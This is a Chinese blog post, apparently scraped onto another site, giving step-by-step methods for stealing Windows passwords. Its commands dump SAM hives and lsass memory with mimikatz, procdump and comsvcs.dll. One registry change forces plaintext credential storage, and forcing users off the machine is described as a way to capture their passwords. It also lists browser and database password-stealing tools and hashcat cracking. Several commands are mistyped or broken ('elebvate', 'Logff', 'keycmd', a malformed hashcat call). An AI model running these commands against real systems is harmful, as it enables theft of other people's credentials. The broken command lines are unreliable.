Windows抓取密码的四种方式&&其他各类密码抓取 | 您所在的位置:网站首页 › windows注册账号密码 › Windows抓取密码的四种方式&&其他各类密码抓取 |
对于Windows(不是域环境)我们有四种方法去抓取它的密码 在线读取SAM文件离线读取SAM文件在线读取Lsass进程离线读取Lsass进程在这次的blog,我们还是用的mimkatz 目录 1.在线读取SAM文件 2.离线读取sam文件 3.在线读取lsass进程 4.离线读取lsass进程 1.任务管理器DUMP 2.通过procdump工具进行dump 3.Power_sploit的Out_minidump的脚本 4.白名单文件 comsvcs.dll 破解lsass.dmp 5.Hashcat 6.RDP凭证抓取 1.通过cmd读取 2.文件夹读取 7.浏览器,数据库密码信息读取 1.BrowserGhost 2.Sharp-HackBrowserData 3.数据库密码抓取 4.抓取各类密码 LaZagne 1.在线读取SAM文件 这个就是最简单的一个做法,直接在mimikatz上面敲上这个的命令 privilege::debug token::elebvate lsadump::sam这个是没有问题的,只不过它只能读取到NTLM hash 因为我们直接在目标机器上面读取hash可能会报毒(本身运行mimikatz也会报毒)所以我们就可以离线读取,其实就是将它的注册表中的sam导出 reg save hklm\sam sam.hive reg save hklm\system system.hive就可以看见这两个文件 然后就是用本地的Mimikatz去导出 lsadump::sam /sam:sam.hive /system:system.hive也是能达到相应的效果的!!!! 这个呢,在某一些win10可以,但是在win11是不行的!!!(最起码我的不行) lsass进程中,存储的是用户的明文密码,所以可能这就是导不出来的原因 privilege::debug sekurlsa::logonpasswordswin11是会直接报这样的错的(版本什么的我也试过了,而且我已经是重新将密码写回到了注册表) 但是对于某些win10,以及win server2012 xp 等低版本是可以的 顺便提一嘴,在一些win10版本 首先肯定是要写入计划表 reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f如果你想获取明文密码可以直接用以下命令 rundll32.exe user32.dll,LockWorkStation //这个可以直接锁屏 或者以下方式 query user //得到当前用户得id Logff id //这个也可以锁屏都能把用户踢下线 ,当他再输密码得时候,我们就可以读取lsass进程得明文密码 ![]() ![]() 离线读取lsass进程,其实就是想办法直接把对应得文件dump出来 1.任务管理器DUMP前提是你得能远程到别人得电脑,然后直接在任务管理器能把他dump出来 然后你就能得到这样的文件 ProcDump 是一个命令行实用工具,其主要用途是监视应用程序的 CPU 峰值,并在出现峰值期间生成故障转储,管理员或开发人员可以使用这些转储来确定出现峰值的原因。 ProcDump 还支持挂起窗口监视(使用与 Windows 和任务管理器使用的窗口挂起相同的定义)、未处理的异常监视,并且可以根据系统性能计数器的值生成转储。 它还可用作可嵌入到其他脚本中的常规进程转储实用工具。 这个是微软自己写的工具,一般不会报毒(360不是一般的软件) procdump.exe -accepteula ma sass.exe lsass.dmp 3.Power_sploit的Out_minidump的脚本通过这个脚本是可以dump出明文hash的 但是可以能对win11不太友好,反正我是不行 通过调用这个文件的api,可以帮我们导出lsass进程 tasklist | findstr "lsass.exe" //查找lsass进程的pid powershell -c "rundll32 C:\windows\system32\comsvcs.dll, MiniDump "lsass.exe的PID" C:\lsass.dmp full"这样我们就可以在c盘下看见一个lsass.dmp的文件啦 这个是可以用mimkatz去进行破解的!! privilege::debug sekurlsa::minidump lsass.dmp sekurlsa::logonpasswords full对于一些winserver 就算是2012以后的也是可以的 但是win11还是不行(我真是无语了) 5.Hashcat这个可以跑多种的密码包括ntlmhash 假如我们现在有这样的一个ntlm hash e25bbe456dd96a635f4434511788e502然后用hashcat hashcat.exe -m ntlm_hash "字典" --force可以看见是能跑出来的 6.RDP凭证抓取 1.通过cmd读取如果我们进入内网之后,我们可以信息收集的时候先敲上这样的一条命令 keycmd /list如果在这台电脑上登录过其他的电脑,而且还勾选了记住我的凭证就会出现以下结果 敲上这样的一个命令 dir /a %userprofile%\appdata\local\microsoft\credentials\*这里放着的都是它的登录记录 解密的话,可以用mimikatz进行解密 这个就直接运行就好,不过只能抓chrome的(我没用chrome) 这个用的比较多,可以直接抓取你的浏览器得密码 Sharp-HackBrowserData.exe //直接运行就好是真的可以抓到,他会生成在result文件夹里面 直接运行这个文件 SharpDecryptPwd.exe -NavicatCrypto后面就是你的参数了 这个工具就比较强大了,基本上可以抓很多东西 lazagne.exe all这是win11得 ![]() 在win server 2012中我是dump出了它的ntlm 和lm hash |
CopyRight 2018-2019 实验室设备网 版权所有 |